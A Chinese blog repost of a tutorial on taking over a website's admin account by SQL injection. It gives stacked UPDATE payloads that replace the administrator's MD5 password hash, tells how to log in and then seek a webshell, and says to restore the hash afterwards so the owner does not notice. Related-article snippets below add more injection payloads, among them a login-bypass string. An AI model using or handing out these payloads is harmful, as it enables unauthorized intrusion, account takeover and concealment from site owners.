sql注射修改管理密码

最新推荐文章于 2024-02-21 16:00:56 发布
最新推荐文章于 2024-02-21 16:00:56 发布
阅读量81 收藏
点赞数
原文链接:http://www.cnblogs.com/mujj/articles/2100318.html
版权

很多时候我们找到了注入点,管理员用户名也猜到了,可就是破解不了Md5密文。很多人到这里都会选择放弃。我们知道sql注入可以进行字段查询,既然可以查询,那么它同样也可以进行字段更新。我们只要把管理员密码的Md5值替换为我们自己的可破解的Md5即可。
       注入点已经找到:http://xxx.com/book.asp?id=1996
       我刚已经用NB检测过了。可以看到,存在表段 shop_admin。
       密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c

       注射的语句如下:
       ;update shop_admin set password=’新MD5加密密码’ where password=’d4716077c2ba075c’–
       比如,我需要把zhuyaod的密码改成wmmhacker,我们首先要先获得wmmhacker通过MD5加密后的十二位密码

       这里用明小子的工具就能转换了。wmmhacker – f8dc763194f29433

       ;update shop_admin set password=’f8dc763194f29433′ where password=’d4716077c2ba075c’–
       我们来测试。看见了,页面没有返回错误,表示成功了。
       现在我们对shop_admin表段下的密码做重新解猜。
       [adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433
       大家对比一下,已经改变了。现在我们可以登陆了。
       进来了。呵呵。就到这里了吧。值得提一句的是,我们进了后台,然后想办法拿到WEBSHELL。
       接着,别忘了把管理员密码还原。不然他会发现滴!
       ;update shop_admin set password=’d4716077c2ba075c’ where password=’f8dc763194f29433′–

之前朋友问我,如何在解不出MD5值下进入后台,这个文章是个不错的思路.

转载于:https://www.cnblogs.com/mujj/articles/2100318.html

weixin_30507481
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dvbbs 8.2 SQL Injection注射漏洞分析
09-06
标题中的“dvbbs 8.2 SQL Injection注射漏洞分析”指的是动网论坛(Dvbbs)8.2版本存在SQL注入漏洞的问题。SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用应用程序对用户输入数据的不恰当处理...
WINDOWS SQL注射
12-14
例如,通过在用户名或密码字段中插入SQL代码,攻击者可以修改管理员密码,如标题中所示的`UPDATE [memlst] SET u_pss='新密码' WHERE u_nme='admin'--`。 在描述中提到了管理员后台的URL,这通常是攻击者寻找的...
简单的SQL语句使用,修改密码,忘记密码解决办法,修改配置文件。
qq_59853240的博客
04-09 3206
简单的库,表,记录的SQL语句使用,修改密码,忘记密码解决办法,修改配置文件。
06_SQL注入_二次注入&加密解密
qq_42171569的博客
05-18 1066
06_SQL注入_加密注入&二次注入 1.加密注入 SQL注入的思路是用户用自定义语句和原本的SQL语句拼接,但有时开发者会对获取到的数据进行加密,那么对于渗透测试者而言如果想要在这样的情况下进行操作,则需要将自己的注入语句进行相同的加密处理后与原本的语句进行拼接。这种类型的大体思路和先前的思路整体无异,唯一的区别就是需要测试者先好payload,再进行加密,随后将数据包放出进行注入尝试。 加密类型的注入在SQLi-Labs中得到了复现,实验如下: 【靶场】SQLi-Labs less-21 【
SQL注入】靶场SQLI DUMB SERIES-24通过二次注入重置用户密码
最新发布
开水的博客
02-21 199
先使用已知信息admin/admin登录进去查下题,发现可以修改密码。第三步,进入修改密码界面,随机输入一个旧密码,然后将需要重置的密码。第一步,注册一个新用户:admin’#/123456。,因此注释符#后面的内容都被注释,导致我们不需要知道。第二步,登录刚刚注册的admin’#用户。用户的密码,即可重置。
mysql 注入 修改密码_SQL注入-二次注入修改其他用户密码
weixin_42463997的博客
01-19 509
二次注入1、使用特殊的SQL符号注册账号$username= mysql_escape_string($_POST['username']) ;$pass= mysql_escape_string($_POST['password']);$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")...
黑客学习-sql注入-二次注入
weixin_49349476的博客
11-24 312
通过二次注入漏洞,把账号更改成我们设置的密码,使能里账号和密码 进行登录
Sql注射总结.rar
07-09
本资料“Sql注射总结”是针对这一主题的详细教程,旨在帮助读者理解和防范SQL注入攻击。 首先,了解SQL注入的基础原理至关重要。当用户输入的数据未经充分验证或转义就被拼接到SQL查询语句中,就可能导致SQL注入...
HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用.doc
09-22
在这个案例中,攻击者可以通过输入特定的SQL语句修改管理员密码(例如:`UPDATE [memlst] SET u_pss='新密码' WHERE u_nme='管理员用户名' --`),从而控制管理员账户。 如果管理员不是超级管理员,有三种方法...
SQL注射语句的经典总结.docx
01-13
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL语句来操纵数据库,获取敏感信息、修改数据甚至控制整个数据库系统。以下是对SQL注入语句的经典总结: 1. **判断注入点**:通常使用`' ; and 1=1`...
第17篇:WEB漏洞~SQL注入~二次、加解密、DNS等注入
廖一语山的博客
07-31 435
小迪v6 二次注入、加解密、DNS外带
黄聪:SQL注入直接修改管理员密码的MD5值
weixin_34214500的博客
06-28 269
直接修改管理员密码的MD5值 然后进后台!(条件 MSSQL) 测试如下: http://www.xx.com/news.asp?id=121 在地址后输入单引号,显示 Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’ 字符串 ’’’ 之前有未闭合的引号 /news/dws.asp,行63 说明没有过滤单引号且数据库是MSS...
SQL注入之万能密码
qq_46172668的博客
07-09 2万+
SQL注入之万能密码 SQL注入的万能密码实际上是利用了网址后台的漏洞,打开下面的网址不用密码和账号也可以登录后台 http://www. .com/admin/admin_login.asp 账号:djlfjdslajdfj(随意输入) 密码:1‘or’1’=‘1 1. 用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。用户登录时,后台执行的数据库查询操作(SQL语句)是:【Selectuser_id,user_type,email From users Where us
sqli-labs(八)——修改密码sql注入+http头sql注入
weixin_30371875的博客
08-28 244
第17关: 这是一个重置密码的功能存在sqk注入,尝试账号密码都输入'",发现只会显示登陆失败,没有报错信息。 这个时候先推测一下后台的sql形式大概应该是: update users set password = ? where name =? 那么实际上是有两个处注入,我们可以先尝试name参数的注入 分别输入: uname=1' or 1=1 # &passwd=1&a...
SQL注入——通过注入得到已知用户名的密码
热门推荐
以梦为马,不负韶华
12-08 2万+
· PHP代码如下: <?php //error_reporting(0); $link =mysqli_connect('localhost', 'root', 'root', 'test'); if (!$link) { die('Could not connect to MySQL: ' .mysqli_connect_error()); } $link->se
sqlserver修改用户名密码
10-25
修改SQL Server的用户名密码,可以按照以下步骤进行操作: 1. 以Windows身份验证方式登录SQL Server。 2. 在SQL Server Management Studio中,右键点击服务器名称,选择“属性”。 3. 在弹出的窗口中选择“安全性...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值